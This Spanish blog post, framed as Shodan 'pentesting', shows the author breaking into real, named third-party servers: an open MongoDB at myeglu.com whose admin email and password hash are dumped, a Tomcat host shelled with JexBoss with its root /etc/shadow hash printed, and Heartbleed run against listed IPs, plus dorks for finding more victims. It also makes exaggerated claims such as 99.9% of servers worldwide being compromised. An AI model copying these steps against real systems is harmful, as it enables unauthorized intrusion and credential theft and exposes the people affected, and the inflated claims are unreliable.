Saludos fieles lectores, luego de un largo tiempo de vacaciones nuevamente estoy retomando el blog, es un placer nuevamente servirles como lo eh estado asiendo desde años atrás.
Sin mas que decir, hoy tocaremos el tema sobre "SHODAN" en su modo Pentesting, utilizando Exploits funcionales que les ayudara a comprender y auditar servidores vulnerables que existen.
Si deseas aprender lo basico de shodan puedes visitar el siguiente enlace:
http://www.backtrack-omar.com/2015/02/shodan-el-buscador-del-informatico-de.html
en primer lugar antes de pasar con la metodología de explotación, tendremos un "Extra" con un gestor de base de datos "poco conocido por algunos", pero utilizados por servidores grandes & pequeños.
MONGODB:
MongoDB es un sistema de base de datos NoSQL orientado a documentos, desarrollado bajo el concepto de código abierto. MongoDB forma parte de la nueva familia de sistemas de base de datos NoSQL
fuente & más información:
https://es.wikipedia.org/wiki/MongoDB
como sabemos MongoDB es un sistema de DB basado en el concepto Open source, pero porque tal gestor esta en este POST.
En su plataforma web, shodan tiene varias secciones donde podemos interactual con ellos, un claro ejemplo es "Databases":
https://www.shodan.io/explore/category/databases
Podemos ver que nos muestra servicios conocidos tales como "MySQL" y "PostgreSQL" denominado (El Oracle OpenSource).
Entre otros el que utilizaremos en esta prueba de concepto "MongoDB",etc.
Ustedes poden darle "CLIP" al servicio mongoDB O simplemente utilizar su "DORK" para una búsqueda personalizada.
product:MongoDB
Podemos observar en la imagen solo nos muestra "2" resultados, que si lo leen bien tenemos lo que se le denomina "FUGA DE INFORMACIÓN".
¿Que es una fuga de información?
Son datos de información delicados o sensibles de un servicio privado que se muestra por motivos humanos o directorios mal protegidos, pero en su gran mayoria existen servicios que muestran tales datos como lo es MongoDB:
Target:
173.208.176.236
|
|||||||||
Tenemos: LA IP y las base de datos que nos arroja directamente, si bien sabemos que un servidor con credenciales no arroja mas halla que un panel de usuario, porque en esta busqueda nos arroja datos sensibles.
Es simple, porque al buscar el producto MongoDB, shodan empieza a recopilar la información de tal gestor de base de datos, que tiene una mala configuración de seguridad.
¿como podemos "Acceder" a los servicios vulnerables?
bueno es simple, si estas en GNU puedes instalar el servicio mongoDB de la siguiente manera:
root@kali:~# apt-get install mongodb
una ves instalado, debemos activar el servicio de la siguiente manera:
root@kali:~# service mongodb start
luego de activar el servicio, como puedes ver si esta activado pues es simple:
root@kali:~# service mongodb status
como vemos en la imagen nuestro servicio esta activo, ahora como lo conectamos a nuestro victima.
En esta prueba de concepto nuestra victima sera:
https://myeglu.com/
https://www.shodan.io/host/104.155.198.131
Conectando al servidor de nuestra victima:
root@kali:~# mongo --host 104.155.198.131
como vemos que nos hemos conectado al servidor por medio de la shell, ahora les enseñare el proceso de sintaxis de mongodb para poder interactuar en la base de datos.
> show dbs - ver todas las base de datos.
> use shop - Escoger la base de datos para interactuar.
> show tables - ver tas tablas de la base de datos.
> db.accounts.findOne() - Extraer todos los atributos de una tabla.
Lo primero que hice fue establecer una vista a las base de datos del servidor, posteriormente escogí la base de datos llamada "shop", luego ejecute show tables para ver todas las tablas que tiene y sin dudar dumpie los datos de la tabla "accounts" y pude obtener los atributos de dicha credencial:
"email" : "gopinath@wiznsystems.com",
"password" : "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
"roles" : [
"admin"
de igual manera tu puedes editar todo los atributos de las columnas porque tienes todos los privilegios necesarios, si eres de las personas que se aburren escribiendo todo en texto plano dichas sintaxis, puedes instalar "Robomongo" - GUI para facilitarte todo este proceso:
Descarga:
https://robomongo.org/download
Pentesting
Explotando un servidor apache obteniendo una SHELL por medio del fallo 5-5.
de tomcat.
EL fallo tiene mucho tiempo de a ver sido descubierto, hace mucho tiempo, en mi caso hubiera elegido hacerlo por msfconsole pero me dio mucha flojera xD
ya que me hubiera gustado enseñarles como auditar un servidor apache para saber si es o no vulnerable, y explotarlo por diferentes maneras, pero creo que por mas técnicas que les enseñe, todo ese proceso puedo ser optimizado por el siguiente exploit:
"Jexboss"
https://github.com/joaomatosf/jexboss
Descarga:
root@kali:~# git clone https://github.com/joaomatosf/jexboss
Encontrar servidores vulnerable:
Server: Apache-Coyote/1.1 Tomcat-5.5
En mi caso elegí un servidor de mi país:
http://190.102.149.180:8080/
Si desean utilizar una búsqueda personalizada pueden utilizar las siguientes dorks:
country:es "PAÍS"
city:barcelona "CIUDAD"
hostname:es "DOMINIO"
ustedes pueden efectuar cualquier rango de país que deseen.
root@kali:~#cd tomcat
root@kali:~/tomcat# python jexboss.py -host http://190.102.149.180:8080/
Les dejare algo en claro, si el sistema operativo es "WINDOWS" debemos utilizar interpretes de comandos #CMD, para poder interactuar correctamente con el servidor.
Si fuese un sistema "GNU" puedes utilizar el comando "uname -a" para saber la kernel que esta utilizando, pero este exploit automáticamente te detecta y muestra el kernel.
la navegación muy diferente un ejemplo para ver los directorios y que permisos tendríamos ejecutan: ls -la.
si deseas obtener credenciales del usuario del sistema operativo utilizaremos 2 comandos:
Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.
Shell> cat /etc/shadow -dumpear credenciales de servicios principales.
Credencial:
root:$6$3cdgngze$gafERX.OCPKvDAhgp9WyriAnR/iuDBZq6WjcZxe8BaFGga/Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0:17107:0:99999:7:::
Bueno si deseas obtener la contraseña puedes hacerlo por "brute force" o simplemente ejecutando una sesión meterpreter por msfconsole y empezar a desmadrar el servidor, por un Exploit local.
Cabe decir que el exploit recientemente ha sido actualizado, con la cual se han añadido mas servicios vulnerables y un "BYPASS" sobre algunos WAF.
Exploit heartbreak
Sin duda uno de los BUG's mas peligrosos a nivel mundial, que se descubrió en el año 2014, aun recuerdo esos años con el foro BlackLastSecurity que funde con mi buen amigo, Kelvin Parra.
Empresas importantes a nivel mundial fueron victima de ataques como:
Youtube, Facebook, Google, Twitter, etc, un 99.9 % de servidores a nivel mundial fueron comprometidos en aquel entonces.
Seguimos con algunos "Tips", si bien es cierto algunas personas no han explotado un servidor con la vulnerabilidad Open SSL llamado Heartbleed.
Si deseas encontrar algunos de estos servidores vulnerables "SHODAN" te ofrece una búsqueda avanzada:
https://www.shodan.io/search?query=vuln:cve-2014-0160
Tenemos 141,927 resultados, para que vayan experimentando este tipo de ataque.
Exploit:
https://mega.nz/#!vURiyJgY!aooAkIOuSX02CpYwjS45XI3zBD5GfLAM28qsfywJgJs
Una ves descargado lo extraemos con el nombre de la carpeta "bleed", posteriormente pasaremos a ingresar a dicha carpeta.
root@kali:~# cd bleed
modo de uso la mayoría de dispositivos encontrados trabajan con el puerto 443:
https://www.shodan.io/host/209.166.152.220
root@kali:~# python heartbleed.py 209.166.152.220
Se ejecutaría de esta manera, sin el puerto por el simple hecho de tener el puerto por default
Este host corre el servicio en el puerto 8443:
https://www.shodan.io/host/188.165.216.132
Entonces lo ejecutaríamos de esta manera:
root@kali:~# python heartbleed.py 188.165.216.132 8443
Hemos explotado el servidor correctamente capturando el trafico de peticiones en vivo, este bug es temido porque captura el trafico de datos de peticiones de la web en su totalidad, cabe decir que si una "organización" grande como facebook en el 2014 millones de peticiones se hacían por minuto, cuantas credenciales fueron capturadas en vivo.
Ahora imagínese en empresas millonarias como PayPal, Ebay, etc el dolor de cabeza que tuvieron en aquel entonces y los millones de dolares que se perdieron.
por ultimo no quiero hacer este POST demasiado largo con otros métodos, espero haberles ayudado.
Saludos!
0 comentarios:
Publicar un comentario